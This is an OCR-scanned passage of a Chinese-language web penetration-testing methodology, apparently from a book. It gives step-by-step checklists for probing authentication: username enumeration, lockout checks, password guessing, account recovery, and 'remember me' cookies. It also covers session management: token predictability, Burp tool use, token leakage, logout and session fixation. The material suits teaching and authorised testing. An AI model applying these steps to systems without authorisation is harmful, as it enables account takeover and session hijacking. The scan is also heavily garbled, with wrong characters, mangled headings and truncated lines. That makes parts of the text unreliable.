我 注册 、 密 码 修 改 、 退 出 与 账户 恢复 功能 中 。 

(2) 辣 每 个 位 置 提交 两 个 请 求 ， 其 中 分 别 包含 一 个 有 效 和 一 个 无 
效 的 用 户 名 。 分 析 服 务 器 对 每 一 个 请 求 的 啊 应 的 各 方面 细节 ， 包 括 
HTTP 状 态 码 、 任 何 重 定 向 、 屏 幕 上 显示 的 信息 、 任 何 隐藏 在 HTML 页 
面 源 代 码 中 的 差异 以 及 服务 器 做 出 啊 应 的 时 间 。 请 注意 ， 其 中 一 些 差 异 
可 能 极其 细微 〈 例 如 ， 看 似 相 同 的 错误 消息 可 能 包含 排版 方面 的 细小 差 
FE) 。 可 以 使 用 拦截 代理 服务 器 的 “历史 记录 ”功能 分 析 进 出 服务 器 的 所 
有 流量 。WebScarab 的 一 项 功能 可 对 两 个 啊 应 进行 比较 ， 以 迅速 确定 它 
们 之 间 的 任何 差异 。 

(3) 如 果 从 提交 有 效 和 无 效用 户 名 返回 的 啊 应 中 发 现任 何 差 异 ， 
那么 使 用 另外 一 组 用 户 名 重复 进行 测试 ， 确 定 啊 应 之 间 是 否 存 在 相同 模 
式 的 差异 ， 以 此 作为 目 动 化 用 户 名 枚 举 的 基础 。 

(4) 检查 应 用 程序 中 任何 其 他 可 帮助 获得 一 组 有 效用 户 名 的 信息 
泄露 源 ， 例 如 ， 日 志 功 能 、 注 册 用 户 列表 以 及 在 源 代码 注释 中 直接 提 太 
姓名 或 电子 邮件 地 址 的 情况 。 

(5) 定位 任何 接受 用 户 名 的 附属 验证 机 制 ， 并 确定 是 否 可 以 将 其 
用 于 用 户 名 枚 举 。 特 别 注 意 允 许 指定 用 户 名 的 注册 页 面 。 















































(1) 确定 应 用 程序 提交 用 户 证 书 的 每 一 个 位 置 。 通 常 ， 用 户主 要 
在 主 登录 功能 和 密码 修改 功能 中 提交 证 书 。 如 果 用 户 可 提交 任意 用 户 
名 ， 密 码 修改 功能 才 会 成 为 密码 猜测 攻击 的 有 效 目 标 。 

(2) 在 每 一 个 位 置 ， 使 用 一 个 受 控制 的 账户 手动 提出 几 个 包含 有 
效用 户 名 但 证 书 无 效 的 请 求 。 监 控 应 用 程序 的 啊 应 ， 确 定 它 们 之 间 的 所 
有 差异 。 如 条 应 用 程序 经 过 大 约 10 次 登录 失败 后 还 没有 返回 任何 有 关 账 
户 锁定 的 消息 ， 再 提 区 一 个 包含 有 效 证 书 的 请 求 。 如 果 这 个 请 求 登 录 成 
功 ， 应 用 程序 可 能 并 未 采用 任何 账户 锁定 策略 。 

(3) 如果 没有 控制 任何 账户 ， 那 么 尝试 枚 举 或 猜测 一 个 有 效 的 用 
户 名 ， 并 使 用 它 提 区 儿 个 无 效 的 请 求 ， 监 控 任 何 有 关 账 尸 锁定 的 错误 消 
恩 。 当 然 ， 应 该 意识 到 ， 这 种 测试 可 能 会 导致 其 他 用 户 的 账户 被 冻结 或 


禁用 。 
21.4.5 ”测试 账户 恢复 功能 


(1) 确定 如 果 用 户 态 记 他 们 的 证 书 ， 应 用 程序 是 否 允 许 他 们 重新 
控制 自己 的 账户 。 通 常 ， 在 主 登录 功能 附近 有 一 个 “ 筷 记 密码 ”链接 即 表 
示 应 用 程序 采用 了 密码 恢复 功能 。 

(2) 使 用 一 个 受 控制 的 账户 完成 整个 密码 恢复 过 程 ， 了 解 账 户 恢 
复 功 能 的 运作 机 制 。 

(3) 如 果 该 功能 使 用 机 密 问 题 之 类 的 质询 ， 确 定 用 户 是 否 可 以 在 
注册 时 设 定 或 选择 他 们 自己 的 质询 。 如 果 可 以 ， 使 用 一 组 枚 举 出 的 或 常 
见 的 用 户 名 获取 一 组 质询 ， 并 对 其 进行 分 析 ， 找 出 任何 很 容易 猜测 出 答 
案 的 质询 。 

(4) 如 果 该 功能 使 用 密码 “暗示 ”， 采 取 和 上 个 步骤 相同 的 操作 获 
得 一 组 密码 暗示， 确定 任何 可 轻易 猜测 出 答案 的 暗示。 

(5) 对 账户 恢复 质询 进行 与 主 登录 功能 相同 的 测试 ， 确 定 可 对 其 
实施 上 自动 猜测 攻击 的 漏洞 。 

(6) 如 果 该 功能 要 求 癌 用 户 发 送 一 封 电 子 邮 件 才 能 完成 整个 恢复 
过 程 ， 寻 找 任何 可 帮助 控制 其 他 用 户 账户 的 弱点 。 确 定 是 否 有 可 能 控制 
接收 以 上 电子 邮件 的 地 址 。 如 果 邮 件 内 容 中 包含 一 个 唯一 的 恢复 URL， 
使 用 受 控 制 的 一 个 电子 邮件 地 址 获得 知 干 邮件 ， 演 试 确 定 任何 可 帮助 预 
O a 
测 的 序列 。 


















































21.4.6 istic ER? Be 


(1) 如 果 主 登录 功能 或 它 的 支持 逻辑 包含 “ 记 住 我 功能， 激活 这 
项 功能 并 分 析 它 的 作用 。 如 果 该 功能 允许 用 户 随后 不 输入 任何 证 书 即 可 
登录 ， 那 么 应 该 仔细 分 析 这 项 功能 ， 碍 找 其 中 存在 的 所 有 漏洞 。 

(2) 仔细 检查 激活 “ 记 住 我 ?功能 时 设 定 的 所 有 持久 性 cookie。 寻 找 
任何 明确 标识 出 用 户 身 份 或 明显 包含 可 预测 的 用 户 标识 符 的 数据 。 

C3) 即使 其 中 保存 的 数据 经 过 严密 编码 或 模糊 处 理 ， 也 要 仔细 分 
析 这 些 数据 ， 并 比较 “ 记 住 > 几 个 非常 类 似 的 用 户 名 和 密码 的 结果 ， 找 到 
任何 可 对 原始 数据 进行 逆 回 工程 的 机 会 。 应 用 21.5.2 节 描述 的 方法 确定 
所 有 有 用 的 数据 。 

(4) 根据 以 上 结果 ， 适 当 修 改 cookie 的 内 容 ， 党 试 伪装 成 其 他 应 用 
程序 用 户 。 


21.4.7 ”测试 伪装 功能 


C1) 如果 应 用 程序 包含 任何 明确 的 功能 ， 人 允许 一 名 用 户 伪装 成 男 
一 名 用 户 ， 那 么 仔细 审查 这 项 功能 ， 查 找 所 有 人 允许 未 经 正确 授权 即 可 伪 
装 成 任意 用 户 的 漏洞 。 

(2) 寻找 所 有 用 户 提 交 的 、 用 于 确定 伪装 目标 的 数据 。 和 演 试 修改 
这 个 数据 ， 伪 装 成 其 他 用 户 ， 特 别 是 可 帮助 提升 权限 的 管理 用 户 。 

(3) 当 针 对 其 他 用 户 账户 实施 上 自动 密码 猜测 攻击 时 ， 寻 找 所 有 了 明 
显 使 用 多 个 有 效 密码 的 账户 ， 或 者 几 个 使 用 相同 密码 的 账户 。 这 表示 应 
A ee ae gaa 
EF o 








21.4.8 MINAH F — PE 


(1) 如 果 应 用 程序 提供 自我 注册 功能 ， 人 允许 指定 想 要 的 用 户 名 ， 
那么 尝试 使 用 不 同 的 密码 注册 同一 个 用 户 名 。 

(2) 如 果 应 用 程序 阻止 第 二 个 注册 尝试 ， 就 可 以 利用 这 种 行为 枚 
举 出 注册 用 户 名 。 

(3) 如 果 应 用 程序 注册 以 上 两 个 账户 ， 深 入 分 析 这 种 情况 ， 确 定 
用 户 名 与 密码 发 生 冲 突 时 应 用 程序 的 行为 。 演 试 修改 一 个 账户 的 密码 ， 
使 其 与 男 一 个 密码 相同 。 同 时 ， 堂 试 使 用 完全 相同 的 用 户 名 与 密码 注册 
两 个 账户 。 

(4) 如 果 在 用 户 名 与 密码 发 生 神 突 时 ， 应 用 程序 用 出 警报 或 产生 








一 个 错误 ， 就 可 以 利用 这 种 行为 实施 上 自动 化 猜测 攻击 ， 确 定 其 他 用 户 的 
密码 。 针 对 一 个 枚 举 出 的 或 猜测 到 的 用 户 名 ， 演 试 使 用 这 个 用 户 名 与 不 
同 的 密码 创建 账户 。 应 用 程序 拒绝 条 个 特殊 的 密码 即 表 示 它 可 能 是 目标 
账户 的 现 有 密码 。 

(5) 如 果 应 用 程序 接受 相互 冲突 的 用 户 名 与 密码 ， 并 且 不 产生 错 
误 ， 那 么 使 用 相互 冲突 的 证 书 登录 ， 确 定 应 用 程序 的 行为 ， 以 及 是 否 
以 利用 这 种 行为 不 经 授权 即 可 访问 其 他 用 户 的 账户 。 








(1) 如 果 用 户 名 或 密码 由 应 用 程序 自动 生成 ， 设 法 获得 几 个 紧密 
相连 的 用 户 名 或 密码 ， 确 定 任何 可 探测 的 顺序 或 模式 。 

(2) 如 果 用 户 名 以 可 预测 的 方式 生成 ， 那 么 同 后 推导 ， 获 得 一 组 
J 这 些 用 户 名 可 作为 自动 密码 猜测 与 其 他 攻击 的 基 
fi 


(3) 如 果 密 码 以 可 预测 的 方式 生成 ， 那 么 推导 这 种 模式 ， 获 取 应 
用 程序 向 其 他 用 户 发 布 的 一 组 密码 。 渗 透 测 试 员 可 以 将 这 些 密码 与 获得 
的 用 户 名 进行 组 合 ， 实 施 密码 猜测 攻击 。 


21.4.10 ”检测 不 安全 的 证 书 传输 


G) 人 遍历 所 有 需要 传输 证 书 、 与 验证 有 关 的 功能 ， 包 括 主 登录 功 
能 、 账 户 注 册 功 能 、 密 碍 修改 功能 以 及 允许 三 看 或 更 新 用 户 个 人 信息 的 
页 面 。 使 用 拦截 代理 服务 器 监控 客户 端 与 服务 器 之 间 的 所 有 流量 。 

(2) 确定 在 来 回 方向 传输 证 书 的 每 二 种 情况 。 可 以 在 拦截 代理 服 
务 器 中 设置 拦截 规则 ， 标 记 包 含 特殊 字符 串 的 消息 。 

(3) 如 果 证 书 在 URL 查 询 字 符 串 中 传输 ， 那 么 这 些 证 书 可 能 会 通 
过 浏览 右 历 史记 录 、 屏 幕 、 服 务 器 日 志 以 及 Referer 消 息 头 《如 果 访 问 第 
三 方 链接 ) HEE 
EE a 可 能 会 通过 XSS 攻 击 或 本 地 隐私 
攻击 泄露 

(5) 如 果 证 书 被 从 服务 器 传送 回 客户 端 ， 攻 击 者 承 可 以 利用 会 话 
管理 或 访问 控制 漏洞 ， 或 者 通过 XSS 攻 击 获 取 这 些 证 书 。 

(6) 如 果 证 书 通过 未 加 密 连 接 传送 ， 它 们 很 可 能 被 罚 听 者 拦截 。 

(7) 如 果 使 用 HTTPS 提 交 证 书 ， 但 使 用 HTTP 加 载 登录 表单 ， 那 么 
ee 攻击 者 也 可 能 使 用 这 种 攻击 手段 获 
证 书 。 























21.4.11 检测 不 安全 的 证 书 分 配 


G) 如 果 应 用 程序 通过 某 种 带 外 通道 创建 账户 ， 或 者 它 提 供 的 自 
我 注册 功能 本 身 并 不 决定 用 户 使 用 的 全 部 初始 证 书 ， 那 么 应 该 确定 应 用 
程序 采用 什么 方法 向 新 用 户 分 配 证 书 。 常 用 的 方法 包括 发 送 电 子 邮件 ， 
或 者 向 邮政 地 址 寄 送 信件 。 

(2) 如 果 应 用 程序 生成 以 禹 外 方式 分 配 的 账户 激活 URL， 尝 试 注 
册 几 个 紧密 相连 的 新 账户 ， 并 确定 收 到 的 UREL 中 的 顺序 。 如 果 能 确定 某 
种 模式 ， 努 力 预 测 应 用 程序 发 送 给 最 近 与 后 续 用 户 的 URL， 并 演 试 使 用 
这 些 URL 占 有 他 们 的 账户 。 

(3) 尝试 多 次 重复 使 用 同一 个 激活 URL， 看 看 应 用 程序 是 否 允 许 
这 样 做 。 如 果 遭 到 拒绝 ， 和 尝试 在 重复 使 用 URL 之 前 锁定 目标 账户 ， 看 看 
URL 是 否 仍 然 可 用 。 确 定 使 用 这 种 方法 是 否 可 以 给 一 个 已 经 激活 的 账户 
设 定 一 个 新 密码 。 


21.4.12 ”测试 不 安全 的 存 化 


C1) 如 果 可 以 访问 散 列 密码 ， 应 检查 共享 同一 散 列 密码 值 的 账 
尸 。 笃 试 以 采用 最 常用 的 散 列 值 的 密码 登录 。 
(2) 使 用 相关 散 列 算法 的 离线 彩虹 表 奋 找 明 文 值 。 


21.4.13 ”测试 逻辑 缺陷 


1. 测试 故障 开放 条 件 

C1) 对 于 要 求 应 用 程序 检查 用 户 证 书 的 每 一 项 功能 (包括 登录 与 
密码 修改 功能 ) ， 使 用 受 控制 的 账户 以 正 第 方式 访问 这 些 功能 。 注 意 它 
们 提交 给 应 用 程序 的 每 一 个 请 求 参数 。 

(2) 连续 多 次 重复 以 上 过 程 ， 以 各 种 无 法 预料 的 方式 轮流 修改 每 
一 个 参数 ， 破 坏 应 用 程序 的 逻辑 。 对 每 一 个 参数 进行 以 下 修改 。 
口 提 交 一 个 空 字符 串 值 。 
口 完全 删除 名 / 值 对 。 
口 提 交 非 常 长 和 非常 短 的 值 。 
O 提交 字符 串 代 疹 数字 或 提交 数字 代 丛 字符 上 串 。 
口 以 相同 和 不 同 的 值 ， 多 次 提交 同一 个 命名 参数 。 

(3) 仔细 检查 应 用 程序 对 上 述 请 求 的 啊 应 。 如 末 出 现任 何 无 法 预 
料 的 差异 ， 对 这 个 结果 进行 进一步 测试 。 如 采 某 个 修改 造成 行为 改变 ， 
设法 将 这 个 修改 与 其 他 更 改组 合 在 一 起 ， 推 动 应 用 程序 的 馆 辑 达到 其 限 





























制 |。 

2. 测试 多 阶段 处 理 机 制 

(1) 如 果 任 何 与 验证 有 关 的 功能 需要 在 一 系列 不 同 的 请 求 中 提交 
证 书 ， 确 定 每 个 阶段 的 主要 目的 ， 同 时 注意 每 个 阶段 提交 的 参数 。 

(2) 连续 多 次 重复 以 上 过 程 ， 修 改 提 区 请 求 的 顺序 ， 破 坏 应 用 程 
序 的 逻辑 。 相 关 测 试 包括 : 
a 以 不 同 的 顺序 完成 所 有 阶段 ， 到 达 想 要 的 那个 阶段 ; 
口 轮流 直接 进 入 每 一 个 阶段 ， 然 后 按 正常 的 顺序 访问 后 续 


口 几 次 访问 上 述 功 能 ， 轮 流 省 略 每 一 个 阶段 ， 然 后 在 后 一 
个 阶段 继续 按 正常 的 顺序 访问 ; 
口 根据 观 察 到 的 结 末 及 每 个 功能 阶段 的 主要 目的 ， 答 试 通 
aac a 
到 的 阶段 。 
(3) 确定 是 否 有 任何 一 项 信息 (如 用 户 名 ) 在 几 个 阶段 被 提交 ， 
或 者 是 因为 用 户 提交 了 它 几 次 ， 或 者 是 因为 它 通 过 客户 新 在 隐藏 表单 字 
段 、cookie 或 预先 设置 的 查询 字符 串 参 数 中 传送 。 如 果 是 这 样 ， 答 试 在 
不 同 的 阶段 提交 不 同 的 值 《 包 括 有 效 和 无 效 的 值 ) ， 并 观察 其 后 果 。 设 
法 确定 提交 的 数据 是 否 是 多 余 的 ， 或 者 在 一 个 阶段 确认 ， 随 后 即 被 应 用 
程序 信任 ， 或 者 在 不 同 的 阶段 通过 不 同 的 检查 进行 确认 。 答 试 利用 应 用 
程序 的 行为 获得 未 授权 访问 ， 或 者 降低 多 阶段 机 制 实施 的 控制 的 效率 。 
(4) 寻找 所 有 通过 客户 端 传送 的 数据 。 如 果 应 用 程序 使 用 隐藏 参 
数 在 各 个 功能 阶段 中 追踪 进程 的 状态 ， 那 么 攻击 者 就 可 以 修改 这 些 参 
数 ， 从 而 破坏 应 用 程序 的 逻辑 。 
O) 如 果 进 程 的 任何 部 分 要 求 应 用 程序 采用 一 个 随机 变化 的 质 
询 ， 对 它 进 行 测试 ， 碍 找 以 下 两 种 常见 的 缺陷 。 
口 如 果 一 个 指定 质询 的 参数 与 用 户 的 啊 应 一 起 提交 ， 确 定 
古人 否 可 以 修改 这 个 值 ， 选 择 上 自己 的 质询 。 
口 多 次 使 用 相同 的 用 户 名 处 理 上 述 不 断 变化 的 质询 ， 确 定 
每 次 是 否 出 现 一 个 不 同 的 质询 。 如 果 每 次 的 质询 各 不 相同 ， 那 
么 就 可 以 重复 进入 这 个 阶段 ， 直 到 应 用 程序 显示 希望 的 质询 ， 
以 这 种 方式 选择 想 要 的 质询 。 



































C1) 分 析 在 各 种 验证 功能 中 发 现 的 所 有 漏洞 ， 确 定 所 有 可 在 攻击 
应 用 程序 过 程 中 用 于 实现 目 己 的 目标 的 漏洞 。 通 常 ， 这 包括 答 试 以 吃 一 





名 用 户 的 身份 进行 验证 ;如 有 可 能 ， 以 拥有 管理 权限 的 用 户 吴 份 验证 。 

(2) 在 实施 自动 攻击 之 前 ， 留 意 已 经 确定 的 所 有 账户 锁定 防御 。 
例如 ， 当 对 登录 功能 实施 用 户 名 枚 举 攻击 时 ， 在 请 求 中 提交 一 个 种 用 的 
而 不 能 完全 随机 的 密码 ， 以 免 在 每 一 个 发 现 的 用 户 名 上 浪费 一 次 登录 失 
败 答 试 。 同 样 ， 应 以 广度 优先 而 非 深 度 优先 的 方式 实施 密码 猜测 攻击 。 
首先 使 用 单词 列表 中 最 第 用 的 脆弱 密码 ， 然 后 使 用 其 他 值 ， 对 每 一 个 榴 
举 出 的 用 户 名 实施 密码 猜测 攻击 。 

(3) 构建 在 密码 猜测 攻击 中 使 用 的 单词 列表 时 ， 应 考虑 密码 强度 
0 a a een 

(4) 使 用 第 14 章 描述 的 技巧 实施 尽 可 能 多 的 自动 攻击 ， 提 高 攻击 
的 速度 与 效率 。 
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图 21-6 ”测试 会 话 管理 机 制 








21.5.1 Boe i | 


C1) 分 析 应 用 程序 用 于 管理 会 话 与 状态 的 机 制 。 确 定 应 用 程序 是 
个 使 用 会 话 令 牌 或 其 他 方法 处 理 每 一 名 用 户 提 交 的 各 种 请 求 。 请 注意 ， 
用 户 通 过 验证 后 ， 一 些 验 证 技术 〈 如 HITP 验 证 ) 并 不 需要 使 用 完整 的 
会 话机 制 重新 确认 用 户 的 身份 。 同 时 ， 一 些 应 用 程序 采用 一 种 无 会 话 状 
人 


(2) 如 果 应 用 程序 使 用 会 话 令 牌 ， 确 定 它 到 底 使 用 哪些 数据 重新 














确认 用 户 的 身份 。HTTP cookie、 查 询 字 符 串 参数 以 及 隐藏 表单 字段 均 
可 用 于 传送 令 牌 。 可 使 用 不 同 的 数据 共同 重新 确认 用 户 的 身份 ， 不 同 的 
数据 可 能 被 不 同 的 后 端 组 件 使 用 。 有 时 ， 看 似 为 会 话 令 牌 的 数据 实际 并 
未 被 应 用 程序 使 用 ， 例 如 ，Web 服 务 器 生成 的 默认 cookie。 

(3) 为 确定 应 用 程序 到 底 使 用 哪些 数据 作为 令 牌 ， 找 到 一 个 确信 
依赖 会 话 的 页 面 〈 如 某 一 名 用 户 的 “用 户 资料 ”页 面 ) BORE, FRIESE 
出 几 个 请 求 ， 系 统 性 地 删除 怀疑 被 用 作 令 牌 的 数据 项 。 如 果 删 除 某 个 数 
据 项 后 ， 应 用 程序 不 再 返回 依赖 会 话 的 页 面 ， 即 可 确定 该 数据 项 为 会 话 











4}. Burp Repeater 是 执行 这 些 测 试 的 有 用 工具 。 

(4) 确定 应 用 程序 使 用 哪些 数据 重新 确认 用 户 的 身份 后 ， 确 定 它 
是 否 对 每 个 令 牌 进行 完整 的 确认 ， 或 者 是 否 忽 略 令 牌 的 某 些 组 成 部 分 。 
修改 令 牌 的 值 ， 一 次 修改 一 字 节 ， 并 确定 修改 后 的 值 是 否 仍 然 被 应 用 程 
序 接受 。 如 果 发 现 令 牌 的 某 些 部 分 并 未 被 用 于 保持 会 话 的 状态 ， 就 不 必 
再 深入 分 析 它 们 。 








(1) 在 不 同时 间 以 几 个 不 同 的 用 户 登 录 ， 记 录 服 务 器 发 布 的 令 
牌 。 如 果 应 用 程序 允许 自我 注册 ， 就 可 以 选择 自己 的 用 户 名 ， 用 一 系列 
存在 细微 差别 的 相似 用 户 名 登录 ， 如 A、AA、AAA、AAAA、AAAB、 
AAAC、AABA 等 。 如 果 其 他 与 某 一 名 用 户 有 关 的 数据 《〈 如 电子 邮件 地 
址 ) 在 登录 阶段 提交 或 保存 在 用 户 资 料 中 ， 对 其 进行 与 前 面 类 似 的 系统 
化 修改 ， 并 截获 收 到 的 令 牌 。 

(2) 分 析 收 到 的 令 牌 ， 查 找 所 有 与 用 户 名 和 其 他 用 户 可 控制 的 数 
据 有 关 的 内 容 。 

(3) 分 析 令 牌 ， 查 找 所 有 明显 的 编码 或 模糊 处 理 方 案 。 查 找 用 户 
名 长 度 与 令 牌 长 度 之 间 的 所 有 相互 关系 ; 这 种 关系 表示 应 用 程序 明显 使 
用 了 某 种 模糊 处 理 或 编码 方案 。 如 果 用 户 名 包含 一 组 相同 的 字符 ， 在 令 
牌 中 寻找 表示 可 能 使 用 XOR 模 糊 处 理 的 对 应 字符 序列 ; 在 令 牌 中 寻找 仅 
包含 十 六 进 制 字 符 的 序列 ， 它 表示 应 用 程序 可 能 对 ASCI 字 符 串 进行 了 
十 六 进 制 编码 处 理 ， 或 者 披露 其 他 信息 。 寻 找 以 等 号 (=) 结尾 的 字符 
序列 或 仅 包 侣 其 他 有 效 Base64 字 符 的 序列 ， 如 a-z、A-Z、0-9、+ 和 /。 

(4) 如 果 可 以 从 会 话 令 牌 样本 中 获得 任何 有 意义 的 数据 ， 确 定 这 
些 信 息 是 否 足 以 帮助 发 动 攻 击 ， 猜 测 出 最 近 发 布 给 其 他 应 用 程序 用 户 的 
令 脾 。 找 到 一 个 依赖 会 话 的 应 用 程序 页 面 ， 使 用 第 14 章 描述 的 技巧 自动 
生成 和 测试 可 能 的 令 牌 。 











21.5.3 ui EY BT PU HE 


(1) 使 用 一 个 可 使 服务 器 返回 一 个 新 令 牌 的 请 求 〈 例 如 一 个 成 功 
登录 请 求 )， 和 生成 并 截获 大 量 紧密 相连 的 会 话 令 牌 。 

(2) 设法 确定 令 牌 样本 中 的 所 有 模式 。 在 所 有 情况 下 ， 都 应 使 用 
Burp Sequtncer 对 应 用 程序 令 牌 的 随机 特性 进行 详细 的 统计 测试 ， 如 第 7 
章 所 述 。 然 而 ， 根 据 自 动 扫 摘 结 末 ， 仍 然 需要 进行 一 些 手 动 分 析 。 

口 理解 应 用 程序 重新 确认 用 户 映 份 的 令 脾 和 子 序列 。 忽 略 
oo 号 份 的 所 有 数据 ， 即 使 样本 中 的 这 些 数据 发 

口 如 果 不 清 楚 令 牌 或 者 令 牌 的 所 有 组 成 成 分 使 用 何 种 类 型 
的 数据 ， 尝 试 使 用 各 种 解码 方法 (例如 Base64) ， 看 能 人 否 得 到 
更 有 意义 的 数据 。 有 时 可 能 有 必要 连续 使 用 几 种 解码 方法 。 

口 设法 确定 解码 后 的 令 牌 或 组 成 成 分 数据 中 存在 的 所 有 模 
式 。 计 算 连 续 值 之 间 的 差距 。 即 使 这 些 值 看 似 杂 乱 无 音 ， 但 是 
它们 之 间 仍 然 可 能 存在 固定 的 差距 ， 人 允许 渗透 测试 员 显 车 缩小 
蛋 力 攻击 的 范围 。 

口 等 待 几 分 钟 后 ， 截 取 类 似 的 一 组 令 牌 样本 ， 重 复 进行 上 
述 分 析 。 设 法 确定 令 牌 的 内 容 是 否 具 有 时 间 依 赖 性 。 

(3) 如 果 已 经 确定 了 所 有 模式 ， 使 用 一 个 不 同 的 IP 地 址 与 用 户 名 
截获 男 一 组 令 牌 样本 ， 确 定 是 否 可 以 探查 到 相同 的 模式 ， 或 者 是 否 可 以 
对 第 一 组 令 牌 进行 推导 ， 猜 测 出 第 二 组 令 牌 。 

(4) 如 果 能 够 确定 可 利用 的 序列 或 时 间 依 赖 关 系 ， 考 虑 这 些 信息 
是 否 足以 帮助 发 动 攻 击 ， 猜 测 出 最 近 发 布 给 其 他 应 用 程序 用 户 的 令 牌 。 
使 用 第 14 章 描述 的 技巧 自动 生成 和 测试 可 能 的 令 牌 。 除 最 简单 的 序列 
外 ， 可 能 需要 在 攻击 中 使 用 某 些 定制 脚本 。 

(5) 如 果 会 话 ID 似乎 是 定制 编写 的 ， 可 以 使 用 Burp Intruder 中 
的 “位 翻转 ?有效 载 傈 源 继续 轮流 修改 会 话 令 脾 中 的 每 个 位 。 同 时 ， 在 啊 


























应 中 查找 表明 修改 令 牌 是 否 会 导致 会 话 无 效 ， 或 会 话 是 否 属于 其 他 用 户 
的 字符 串 。 





CL) 以 正常 方式 访问 应 用 程序 ， 从 “起 始 "URL 中 的 未 通过 验证 的 
内 容 开始 ， 到 登录 过 程 ， 再 到 应 用 程序 的 全 部 功能 。 留 意 发 布 新 会 话 令 
牌 的 每 一 种 情况 ， 确 定 哪些 部 分 使 用 HTTP 通 信 ， 哪 些 部 分 使 用 HTTPS 
通信 。 可 以 使 用 拦截 代理 器 的 日 志 功 能 记录 这 些 信息 。 


(2) 如 果 应 用 程序 使 用 HTTP cookie 传 送 会 话 令 牌 ， 应 确认 其 是 否 
设置 了 安全 标记 ， 防 止 通过 HTTP 连 接 传送 令 牌 。 

(3) 在 正常 使 用 应 用 程序 的 情况 下 ， 确 定 会 话 令 牌 是 否 通 过 HTTP 
连接 传送 。 如 果 是 这 样 ， 它 们 就 很 容易 被 拦截 。 

(4) 如 果 应 用 程序 在 未 通过 验证 的 区 域 使 用 HTTP， 然 后 在 登录 或 
通过 验证 的 区 域 转换 到 HITPS， 那 么 确认 应 用 程序 是 否 为 HITPS 通 信 发 
布 一 个 新 的 令 牌 ， 或 者 应 用 程序 在 转换 到 HTTPS 后 是 否 仍然 使 用 HTTP 
阶段 的 令 牌 。 如 果 是 这 样 ， 它 们 就 很 容易 被 拦截 。 

(5) 如 果 应 用 程序 的 HTTPS 区 域 包含 指向 HITP URL 的 链接 ， 访 
问 这 些 链接 ， 确 认 在 访问 过 程 中 是 否 有 会 话 令 牌 被 提交 ; 如 果 是 这 样 ， 
该 令 牌 或 者 继续 有 效 ， 或 者 立即 被 服务 器 终止 。 
































C1) 如 果 在 应 用 程序 解析 过 程 中 能 确定 任何 日 志 、 监 控 或 诊断 功 
能 ， 应 仔细 检查 这 些 功 能 ， 确 定 它 们 是 否 泄露 任何 会 话 令 牌 。 确 定 在 正 
常情 况 下 哪些 人 有 权 访 问 这 些 功能 ， 如 果 只 有 管理 员 能 够 使 用 这 些 功 
能 ， 那 么 确认 低 权 限 用 户 是 人 否 可 以 利用 任何 其 他 漏洞 访问 它们 。 

(2) 确定 所 有 在 URL 中 传送 会 话 令 牌 的 情况 。 可 能 应 用 程序 通常 
以 更 加 安全 的 方式 传送 令 牌 ， 而 开发 者 在 特定 情况 下 使 用 URL 来 解决 特 
殊 难 题 。 如 果 是 这 样 ， 当 用 户 访问 站 外 链接 时 ， 这 些 令 脾 将 在 Referer 消 
ee 
去 的 功能 。 

(3) 如 果 能 够 收集 到 发 布 给 其 他 用 户 的 有 效 会 话 令 牌 ， 束 对 每 个 
令 牌 进行 测试 ， 确 定 它 是 否 属于 管理 用 户 〈 例 如 ， 尝 试 使 用 令 牌 访问 某 
个 特权 功能 


21.5.6 ”测试 令 脾 -会 话 有 





(1) 用 同一 个 用 户 账 户 从 不 同 的 浏览 器 进程 或 从 不 同 的 计算 机 两 
次 登录 应 用 程序 。 确 定 这 两 个 会 话 是 否 都 处 于 活动 状态 。 是 就 表示 应 用 
程序 支持 并 行 会 话 ， 可 让 攻破 其 他 用 户 证 书 的 攻击 者 能 够 利用 这 些 证 
书 ， 而 不 会 有 被 检测 出 来 的 风险 。 

(2) 使 用 同一 个 用 户 账户 从 不 同 的 浏览 器 进程 或 从 不 同 的 计算 机 
登录 并 退出 应 用 程序 儿 次 。 确 定 应 用 程序 在 每 次 登录 时 是 发 布 一 个 新 会 
话 令 牌 ， 还 是 发 布 相同 的 令 牌 。 如 宁 每 次 发 布 相同 的 令 牌 ， 那 么 应 用 程 
序 根本 没有 正确 使 用 令 牌 ， 而 是 使 用 唯一 持久 性 字符 串 重 新 确认 用 户 刁 























ore 应 用 程序 就 没有 办 法 防止 并 行 登录 或 正确 实施 会 话 
各 时 。 


C3) 如 果 令 牌 明显 包含 菏 种 结构 和 意义 ， 设 法 将 标识 用 户 身 份 的 
成 分 与 无 法 辨别 的 成 分 区 分 开 来 。 尝 试 修改 与 用 户 有 关 的 所 有 令 牌 成 
分 ， 使 其 指向 其 他 已 知 的 应 用 程序 用 户 ， 并 确定 修改 后 的 令 牌 是 否 被 应 
用 程序 接受 ， 以 及 能 够 让 攻击 者 伪装 成 该 用 户 。 请 参阅 第 7 章 了 解 这 种 
细微 漏洞 的 示例 。 


21.5.7 MRSE IE 


(1) 当 测 试 会 话 超 时 与 退出 漏洞 时 ， 主 要 测试 服务 器 如 何 处 理会 
话 与 令 牌 ， 而 不 是 客户 端 发 生 的 任何 事件 。 在 客户 端 浏 览 器 内 对 令 牌 执 
行 的 操作 并 不 能 终止 会 话 。 

(2) 检查 服务 器 是 否 执行 会 话 终止 。 

口 登录 应 用 程序 获得 一 个 有 效 令 牌 。 

口 不 使 用 这 个 令 脾 ， 等 待 一 段 时 间 后 ， 用 这 个 令 牌 提交 一 

问 受 保护 页 面 〈 如 “我 的 资料 ”页 面 ) 的 请 求 。 

口 如 果 该 页 面 正 常 显示 ， 那 么 令 牌 仍然 处 于 活动 状态 。 

口 使 用 反复 试验 的 方法 确定 会 话 终 止 超时 时 间 为 多 久 ， 或 
者 一 个 令 牌 在 前 一 次 使 用 它 提 交 请 求 几 天 后 是 否 仍 被 使 用 。 可 
Intruder 递 增 连 续 请 求 之 间 的 时 间 间 隔 ， 上 自动 完成 这 
项 任务 。 

(3) 检查 退出 功能 是 否 存 在 。 如 果 应 用 程序 使 用 退出 功能 ， 测 试 
它 是 否 能 够 在 服务 器 上 有 效 确认 用 户 的 会 话 。 退 出 后 ， 尝 试 重新 使 用 原 
有 的 令 牌 ， 使 用 它 请 求 一 个 受 保护 的 页 面 ， 确 定 其 是 否 仍然 有 效 。 如 果 
令 牌 仍然 有 效 ， 那 么 即使 用 户 已 经 * 退 出”， 他 们 依然 易于 受到 会 话 劫持 
攻击 。 可 以 使 用 Burp Repeater 从 代理 历史 记录 中 不 断 发 送 一 个 特殊 的 请 
求 ， 观 察 退 出 后 应 用 程序 是 否 做 出 不 同 的 啊 应 。 
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C1) WAR DAA REP? AEE SEAL RES, SRE SS 
录 。 如 采 应 用 程序 在 登录 后 并 不 发 布 一 个 新 令 牌 ， 就 表示 它 易 于 受到 会 
话 固定 攻击 。 

